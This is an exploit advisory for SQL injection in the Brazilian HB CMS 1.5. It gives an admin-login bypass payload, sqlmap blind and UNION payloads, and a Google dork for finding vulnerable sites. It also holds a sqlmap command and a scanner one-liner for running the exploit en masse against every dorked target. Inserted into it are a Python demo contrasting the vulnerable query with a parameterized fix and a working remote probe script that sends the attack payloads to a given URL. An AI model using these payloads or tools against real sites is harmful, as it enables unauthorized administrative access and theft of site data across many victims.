0day - PHP exploit for SQL INJECTION (via GET/POST) in the Brazilian CMS HB, made by the company "Agência HB Web e Cia".
[+] Discoverer Author: M3t4tr0n
[+] FACEBOOK: https://www.facebook.com/M3T4TR0N
[+] EMAIL: [email protected]
[*] Thanks M3t4tr0n
# SCRIPT by: [ I N U R L-B R A S I L ] - [ By GoogleINURL ]
# EXPLOIT NAME: XPL 0day CMS HB 1.5 / INURL BRASIL
# AUTHOR: Cleiton Pinheiro / Nick: googleINURL
# Email: [email protected]
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin: http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# EA: http://exploit4arab.net/author/248/Cleiton_Pinheiro
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
Neither war between hackers, nor peace for the system.
------------------------------------------------------------------------------
[ + ] VULNERABILITY REPORTED:
15/May/2015
[ + ] Type:
SQL INJECTION: authentication bypass on the administrative panel (POST) and blind/UNION injection on the public site (GET)
[ + ] Vendor:
http://www.hbwebecia.com.br/
[ + ] Version:
HB 1.5
[ + ] Google Dork:
inurl:"base.php?pagina"
[ + ] FILE VULN:
/admin/logar.php
[ + ] POC:
(POST) http://{YOUR_URL}/admin/logar.php
POST body: login='=' 'or'&senha='=' 'or'&Submit3=Entrar
(both fields are injected: the leading quote closes the login/senha string literal, and MySQL evaluates the rest of the WHERE clause as true, so the login query matches without valid credentials)
[ + ] FILE VULN:
/base.php
[ + ] POC:
(GET) http://{YOUR_URL}/base.php?pagina=noticia&id=1 (injectable parameter: id)
[ + ] SQLMAP exploitation output:
# Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagina=noticia&id=114' AND 1866=1866 AND 'qvCe'='qvCe
# Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: pagina=noticia&id=114' AND (SELECT * FROM (SELECT(SLEEP(5)))MPQc) AND 'MJVC'='MJVC
# Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: pagina=noticia&id=114' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x664a78565a7276576e76,0x71787a7871),NULL,NULL--
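The sqlmap findings above can be reproduced offline. The following is an added example, not code from the advisory, from xpl.php or from HB CMS: a constructed stand-in for the noticia lookup behind base.php?pagina=noticia&id=..., built on sqlite3 so it runs without a target. The table names, rows and function names are assumptions; the payload shapes are the ones sqlmap reported, with MySQL's CONCAT(0x...) marker rewritten as SQLite's || and a one-column UNION (the time-based payload needs MySQL's SLEEP() and is omitted). The vulnerable concatenation is shown beside the parameterized fix.

```python
"""Added example (not advisory/CMS code): sqlite3 stand-in for the noticia
lookup, showing the injectable concatenation beside the bound-parameter fix."""
import sqlite3


def make_db():
    """Constructed sample data; the real CMS schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE noticia (id INTEGER, titulo TEXT)")
    db.executemany("INSERT INTO noticia VALUES (?, ?)",
                   [(1, "Primeira noticia"), (114, "Noticia 114")])
    db.execute("CREATE TABLE admin (login TEXT, senha TEXT)")
    db.execute("INSERT INTO admin VALUES ('admin', 's3cret')")
    return db


def noticia_vulnerable(db, id_param):
    """The pattern the advisory implies: the request parameter is pasted into
    the SQL text, so a quote in ?id= ends the literal and the rest is SQL."""
    sql = "SELECT titulo FROM noticia WHERE id='%s'" % id_param
    return [row[0] for row in db.execute(sql)]


def noticia_fixed(db, id_param):
    """Hardened form: the value is bound, never parsed as SQL.  A payload is
    just a string that matches no id."""
    sql = "SELECT titulo FROM noticia WHERE id=?"
    return [row[0] for row in db.execute(sql, (id_param,))]


# Payloads in the shape sqlmap reported above (boolean-based blind, UNION).
BOOL_TRUE = "1' AND 1=1 AND 'x'='x"
BOOL_FALSE = "1' AND 1=2 AND 'x'='x"
# sqlmap's UNION probe: 0x716a786b71 / 0x71787a7871 decode to the 'qjxkq' /
# 'qxzxq' markers it looks for in the response; here joined with || instead
# of CONCAT().  The trailing -- comments out the CMS's closing quote.
UNION_MARKER = "114' UNION ALL SELECT 'qjxkq'||'fJxVZrvWnv'||'qxzxq'--"
# The same UNION used to read a different table (constructed admin table).
UNION_ADMIN = "114' UNION ALL SELECT login||':'||senha FROM admin--"


def demo():
    """Run every payload through both versions and return the rows seen."""
    db = make_db()
    return {
        "vuln_true": noticia_vulnerable(db, BOOL_TRUE),     # row comes back
        "vuln_false": noticia_vulnerable(db, BOOL_FALSE),   # row disappears
        "vuln_union": noticia_vulnerable(db, UNION_ADMIN),  # extra admin row
        "fixed_true": noticia_fixed(db, BOOL_TRUE),         # nothing matches
        "fixed_plain": noticia_fixed(db, "1"),              # normal use works
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:12s} -> {rows}")
```

The boolean pair is exactly what the blind technique relies on: the always-true payload returns the same page as the plain request, the always-false one returns an empty result, and that difference is the oracle sqlmap reads. With the bound parameter both payloads return nothing, which is the behaviour a fixed base.php should show.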
[ + ] USE SQLMAP:
./sqlmap.py -u 'http://{YOUR_URL}/base.php?pagina=noticia&id=1' \
--dbs --random-agent --level 3 --risk 2 --proxy 'http://localhost:8118' \
--dbms='MySQL' --threads 3 --time-sec 10 --identify-waf --text-only \
--flush-session --batch
[ + ] EXECUTE:
php xpl.php -t http://target.us
[ + ] FILE_OUTPUT :
HB.txt
PRINT OUTPUT: (screenshot of the exploit output, not reproduced in this text)
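The advisory's own checker, xpl.php, is not reproduced on the page. As an added example (not the author's xpl.php and not CMS code), here is a stand-alone probe for the two issues above, written against the paths and payloads the advisory gives. The response-comparison heuristics, the 0.9 similarity threshold, the control credentials and the User-Agent are choices made here; the paths, the auth-bypass body and the boolean-based payload shape come from the advisory. Nothing is sent unless a target URL is passed on the command line.

```python
"""Added example (not the advisory's xpl.php): probe /admin/logar.php for the
auth bypass and /base.php for boolean-based blind injection, then compare
responses.  Thresholds and control inputs are assumptions made here."""
import difflib
import sys
import urllib.parse
import urllib.request

LOGIN_PATH = "/admin/logar.php"   # from the advisory
NEWS_PATH = "/base.php"           # from the advisory
TIMEOUT = 15


def auth_bypass_body():
    """The advisory's POST body for /admin/logar.php.  Each value starts with
    a quote that closes the CMS's string literal; MySQL evaluates what is
    left of the WHERE clause as true, so the query matches without a password."""
    return urllib.parse.urlencode(
        {"login": "'=' 'or'", "senha": "'=' 'or'", "Submit3": "Entrar"})


def failed_login_body():
    """Control request (constructed): credentials that should never work."""
    return urllib.parse.urlencode(
        {"login": "nonexistent-user", "senha": "wrong", "Submit3": "Entrar"})


def blind_queries(news_id="1"):
    """(true, false) query strings for base.php in the shape sqlmap reported."""
    true_q = urllib.parse.urlencode(
        {"pagina": "noticia", "id": f"{news_id}' AND 1=1 AND 'x'='x"})
    false_q = urllib.parse.urlencode(
        {"pagina": "noticia", "id": f"{news_id}' AND 1=2 AND 'x'='x"})
    return true_q, false_q


def similarity(a, b):
    """0.0 .. 1.0 similarity of two response bodies."""
    return difflib.SequenceMatcher(None, a, b).ratio()


def boolean_injectable(base_body, true_body, false_body, threshold=0.9):
    """Blind oracle: the always-true condition should give back the normal
    page, the always-false one should change it (no noticia selected)."""
    return (similarity(base_body, true_body) >= threshold
            and similarity(base_body, false_body) < threshold)


def login_bypassed(failed_body, bypass_body, threshold=0.9):
    """Heuristic: if the bypass response differs markedly from a plainly
    failed login (e.g. a redirect into the panel), the injected WHERE clause
    most likely matched a row.  Confirm by hand before reporting."""
    return similarity(failed_body, bypass_body) < threshold


def fetch(url, data=None):
    """GET, or POST when a urlencoded body is given; redirects are followed."""
    req = urllib.request.Request(
        url, data=data.encode() if data is not None else None,
        headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=TIMEOUT) as resp:
        return resp.read().decode("utf-8", "replace")


def main(target):
    target = target.rstrip("/")
    base = fetch(f"{target}{NEWS_PATH}?pagina=noticia&id=1")
    true_q, false_q = blind_queries("1")
    t_body = fetch(f"{target}{NEWS_PATH}?{true_q}")
    f_body = fetch(f"{target}{NEWS_PATH}?{false_q}")
    print("[base.php] boolean-based blind:",
          "LIKELY" if boolean_injectable(base, t_body, f_body) else "not confirmed")

    failed = fetch(f"{target}{LOGIN_PATH}", failed_login_body())
    bypass = fetch(f"{target}{LOGIN_PATH}", auth_bypass_body())
    print("[admin/logar.php] auth bypass:",
          "LIKELY" if login_bypassed(failed, bypass) else "not confirmed")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: python hb_check.py http://target.us")
    main(sys.argv[1])
```

Usage mirrors the advisory's `php xpl.php -t http://target.us`: `python hb_check.py http://target.us`. The two comparisons are deliberately separate because they prove different things: the blind pair shows the `id` value reaches the query parser, while the login comparison only shows that the bypass body produced something other than a failed-login page, which is why it asks for manual confirmation.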
[ + ] Exploit:
http://www.exploit4arab.net/exploits/1505 / http://pastebin.com/AY6sMthP
[ + ] EXPLOIT MASS USE SCANNER INURLBR:
php inurlbr.php --dork 'inurl:"base.php?pagina" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'
PRINT OUTPUT: (screenshot of the scanner output, not reproduced in this text)
More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR